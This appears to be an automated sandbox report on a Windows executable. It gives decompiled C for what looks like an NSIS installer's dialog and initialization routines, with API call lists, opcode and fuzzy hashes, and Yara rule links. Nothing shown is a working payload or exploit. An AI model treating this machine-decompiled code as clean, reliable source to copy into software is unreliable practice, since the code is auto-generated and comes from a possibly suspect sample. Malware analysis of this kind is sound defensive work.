                                                                                                                                                                          Function 0294782B, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • TerminateProcess.KERNELBASE ref: 02947859
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 560597551-0
                                                                                                                                                                          • Opcode ID: 54d2ef48408db9d147fdf7401288d2f8a8450c83276e0e8b5f1fba511665ab5d
                                                                                                                                                                          • Instruction ID: da7abc91c699c6fe749e05208ea07d5d73897c0d49d1f042b9b486d904efae0e
                                                                                                                                                                          • Opcode Fuzzy Hash: 54d2ef48408db9d147fdf7401288d2f8a8450c83276e0e8b5f1fba511665ab5d
                                                                                                                                                                          • Instruction Fuzzy Hash: ADF02773200245CFC7059F34C859788B7B1EF91A84F89019CC6868FB92C728D94ACB41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029486FB, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: b0247dc1ca90f97b78998cc3b16bb07352fe13fd1f3ad2f501e573172db31a25
                                                                                                                                                                          • Instruction ID: 4dd317c3aef0d8942629de66735fa22bb84dc4415fcee3b6908f7f4e0aef006d
                                                                                                                                                                          • Opcode Fuzzy Hash: b0247dc1ca90f97b78998cc3b16bb07352fe13fd1f3ad2f501e573172db31a25
                                                                                                                                                                          • Instruction Fuzzy Hash: 96A012B015000512D05076650500D4F000A5FC1304F94C0046100072CDCF15CA553BE0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403F9A, Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                          			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8); // executed
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136;
							if( *0x433ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136;
									if( *0x433ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc;
						return 0 |  *0x433ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x42f268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                                                                                                                          0x00403fa5
                                                                                                                                                                          0x00403fac
                                                                                                                                                                          0x00404113
                                                                                                                                                                          0x00404117
                                                                                                                                                                          0x0040411b
                                                                                                                                                                          0x0040411d
                                                                                                                                                                          0x00404122
                                                                                                                                                                          0x0040412d
                                                                                                                                                                          0x00404138
                                                                                                                                                                          0x0040413d
                                                                                                                                                                          0x0040413f
                                                                                                                                                                          0x00404141
                                                                                                                                                                          0x00404144
                                                                                                                                                                          0x00404149
                                                                                                                                                                          0x00404157
                                                                                                                                                                          0x00404164
                                                                                                                                                                          0x0040416b
                                                                                                                                                                          0x0040416b
                                                                                                                                                                          0x0040416c
                                                                                                                                                                          0x0040416c
                                                                                                                                                                          0x00404171
                                                                                                                                                                          0x00404177
                                                                                                                                                                          0x0040417e
                                                                                                                                                                          0x00404184
                                                                                                                                                                          0x00404186
                                                                                                                                                                          0x004041c6
                                                                                                                                                                          0x004041cb
                                                                                                                                                                          0x004041d0
                                                                                                                                                                          0x004041d0
                                                                                                                                                                          0x004041d5
                                                                                                                                                                          0x004041de
                                                                                                                                                                          0x004041e0
                                                                                                                                                                          0x004041e5
                                                                                                                                                                          0x004041eb
                                                                                                                                                                          0x004041ef
                                                                                                                                                                          0x004041ef
                                                                                                                                                                          0x004041f4
                                                                                                                                                                          0x004041fa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404205
                                                                                                                                                                          0x0040420b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404214
                                                                                                                                                                          0x0040421c
                                                                                                                                                                          0x00404221
                                                                                                                                                                          0x00404224
                                                                                                                                                                          0x0040422a
                                                                                                                                                                          0x0040422f
                                                                                                                                                                          0x00404232
                                                                                                                                                                          0x00404238
                                                                                                                                                                          0x0040423d
                                                                                                                                                                          0x00404240
                                                                                                                                                                          0x00404246
                                                                                                                                                                          0x0040424e
                                                                                                                                                                          0x00404254
                                                                                                                                                                          0x0040425a
                                                                                                                                                                          0x0040425e
                                                                                                                                                                          0x00404265
                                                                                                                                                                          0x00404265
                                                                                                                                                                          0x00404265
                                                                                                                                                                          0x0040426f
                                                                                                                                                                          0x00404281
                                                                                                                                                                          0x0040428d
                                                                                                                                                                          0x00404292
                                                                                                                                                                          0x0040429c
                                                                                                                                                                          0x004042a2
                                                                                                                                                                          0x004042a4
                                                                                                                                                                          0x004042a9
                                                                                                                                                                          0x004042a6
                                                                                                                                                                          0x004042a6
                                                                                                                                                                          0x004042a6
                                                                                                                                                                          0x004042b9
                                                                                                                                                                          0x004042d1
                                                                                                                                                                          0x004042d3
                                                                                                                                                                          0x004042d9
                                                                                                                                                                          0x004042ee
                                                                                                                                                                          0x004042db
                                                                                                                                                                          0x004042e4
                                                                                                                                                                          0x004042e6
                                                                                                                                                                          0x004042e6
                                                                                                                                                                          0x004042f4
                                                                                                                                                                          0x00404305
                                                                                                                                                                          0x0040431b
                                                                                                                                                                          0x00404322
                                                                                                                                                                          0x00404328
                                                                                                                                                                          0x0040432c
                                                                                                                                                                          0x00404331
                                                                                                                                                                          0x00404333
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404339
                                                                                                                                                                          0x00404339
                                                                                                                                                                          0x0040433b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404341
                                                                                                                                                                          0x00404345
                                                                                                                                                                          0x0040436a
                                                                                                                                                                          0x00404370
                                                                                                                                                                          0x00404376
                                                                                                                                                                          0x00404378
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040439e
                                                                                                                                                                          0x004043a4
                                                                                                                                                                          0x004043a6
                                                                                                                                                                          0x004043ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004043b1
                                                                                                                                                                          0x004043b4
                                                                                                                                                                          0x004043b7
                                                                                                                                                                          0x004043ce
                                                                                                                                                                          0x004043da
                                                                                                                                                                          0x004043f3
                                                                                                                                                                          0x004043f9
                                                                                                                                                                          0x004043fd
                                                                                                                                                                          0x00404402
                                                                                                                                                                          0x00404408
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404412
                                                                                                                                                                          0x0040441d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040441d
                                                                                                                                                                          0x00404347
                                                                                                                                                                          0x0040434d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404353
                                                                                                                                                                          0x00404359
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040435f
                                                                                                                                                                          0x00404333
                                                                                                                                                                          0x0040442a
                                                                                                                                                                          0x00404436
                                                                                                                                                                          0x0040443d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404188
                                                                                                                                                                          0x00404188
                                                                                                                                                                          0x0040418b
                                                                                                                                                                          0x004041be
                                                                                                                                                                          0x004041be
                                                                                                                                                                          0x004041c0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004041c0
                                                                                                                                                                          0x0040418d
                                                                                                                                                                          0x00404191
                                                                                                                                                                          0x00404196
                                                                                                                                                                          0x00404198
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004041a8
                                                                                                                                                                          0x004041b0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004041b6
                                                                                                                                                                          0x00403fbe
                                                                                                                                                                          0x00403fbe
                                                                                                                                                                          0x00403fc2
                                                                                                                                                                          0x00403fc7
                                                                                                                                                                          0x00403fd6
                                                                                                                                                                          0x00403fd6
                                                                                                                                                                          0x00403fdc
                                                                                                                                                                          0x00403fe3
                                                                                                                                                                          0x00404027
                                                                                                                                                                          0x0040402d
                                                                                                                                                                          0x00404046
                                                                                                                                                                          0x00404049
                                                                                                                                                                          0x0040405c
                                                                                                                                                                          0x00404062
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404068
                                                                                                                                                                          0x00404073
                                                                                                                                                                          0x00404075
                                                                                                                                                                          0x00404077
                                                                                                                                                                          0x00404096
                                                                                                                                                                          0x00404096
                                                                                                                                                                          0x00404099
                                                                                                                                                                          0x0040409e
                                                                                                                                                                          0x004040a1
                                                                                                                                                                          0x004040b1
                                                                                                                                                                          0x004040b2
                                                                                                                                                                          0x004040b4
                                                                                                                                                                          0x004040ea
                                                                                                                                                                          0x004040fa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004040fa
                                                                                                                                                                          0x004040b6
                                                                                                                                                                          0x004040bc
                                                                                                                                                                          0x004040d5
                                                                                                                                                                          0x004040da
                                                                                                                                                                          0x004040dc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004040de
                                                                                                                                                                          0x004040ca
                                                                                                                                                                          0x004040ca
                                                                                                                                                                          0x004040cc
                                                                                                                                                                          0x004040cc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004040cc
                                                                                                                                                                          0x004040bf
                                                                                                                                                                          0x004040c4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004040c4
                                                                                                                                                                          0x004040a3
                                                                                                                                                                          0x004040a9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004040ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004040ab
                                                                                                                                                                          0x0040409b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040409b
                                                                                                                                                                          0x00404081
                                                                                                                                                                          0x00404088
                                                                                                                                                                          0x0040408e
                                                                                                                                                                          0x00404090
                                                                                                                                                                          0x00404466
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404466
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404090
                                                                                                                                                                          0x0040404e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404056
                                                                                                                                                                          0x00404035
                                                                                                                                                                          0x0040403b
                                                                                                                                                                          0x00404443
                                                                                                                                                                          0x00404449
                                                                                                                                                                          0x00404456
                                                                                                                                                                          0x0040445c
                                                                                                                                                                          0x0040445c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403fe5
                                                                                                                                                                          0x00403fea
                                                                                                                                                                          0x00403ff6
                                                                                                                                                                          0x00403fff
                                                                                                                                                                          0x00404100
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040401e
                                                                                                                                                                          0x00404021
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404021
                                                                                                                                                                          0x00403fff
                                                                                                                                                                          0x00403fe3

                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                          • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                          • SetWindowLongW.USER32 ref: 0040404E
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040406D
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404133
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040413D
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404157
                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0040424E
                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                          • EnableMenuItem.USER32 ref: 004042B9
                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                          • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                          • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3618520773-0
                                                                                                                                                                          • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                          • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                          • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                          • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403BEC, Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                          			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc;
								if( *0x433ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                                                                                                          0x00403bf2
                                                                                                                                                                          0x00403bfb
                                                                                                                                                                          0x00403c02
                                                                                                                                                                          0x00403c04
                                                                                                                                                                          0x00403c18
                                                                                                                                                                          0x00403c2a
                                                                                                                                                                          0x00403c33
                                                                                                                                                                          0x00403c3c
                                                                                                                                                                          0x00403c43
                                                                                                                                                                          0x00403c48
                                                                                                                                                                          0x00403c4f
                                                                                                                                                                          0x00403c62
                                                                                                                                                                          0x00403c62
                                                                                                                                                                          0x00403c6d
                                                                                                                                                                          0x00403c06
                                                                                                                                                                          0x00403c11
                                                                                                                                                                          0x00403c11
                                                                                                                                                                          0x00403c72
                                                                                                                                                                          0x00403c7c
                                                                                                                                                                          0x00403c85
                                                                                                                                                                          0x00403c8a
                                                                                                                                                                          0x00403c9b
                                                                                                                                                                          0x00403d2d
                                                                                                                                                                          0x00403d35
                                                                                                                                                                          0x00403d3e
                                                                                                                                                                          0x00403d3e
                                                                                                                                                                          0x00403d54
                                                                                                                                                                          0x00403d5a
                                                                                                                                                                          0x00403d68
                                                                                                                                                                          0x00403de9
                                                                                                                                                                          0x00403df1
                                                                                                                                                                          0x00403dfb
                                                                                                                                                                          0x00403e00
                                                                                                                                                                          0x00403e06
                                                                                                                                                                          0x00403e90
                                                                                                                                                                          0x00403e95
                                                                                                                                                                          0x00403e97
                                                                                                                                                                          0x00403eb3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403eb3
                                                                                                                                                                          0x00403e99
                                                                                                                                                                          0x00403e9f
                                                                                                                                                                          0x00403ea7
                                                                                                                                                                          0x00403ea7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403e9f
                                                                                                                                                                          0x00403e14
                                                                                                                                                                          0x00403e1f
                                                                                                                                                                          0x00403e24
                                                                                                                                                                          0x00403e26
                                                                                                                                                                          0x00403e2d
                                                                                                                                                                          0x00403e2d
                                                                                                                                                                          0x00403e38
                                                                                                                                                                          0x00403e40
                                                                                                                                                                          0x00403e42
                                                                                                                                                                          0x00403e44
                                                                                                                                                                          0x00403e4d
                                                                                                                                                                          0x00403e50
                                                                                                                                                                          0x00403e56
                                                                                                                                                                          0x00403e56
                                                                                                                                                                          0x00403e75
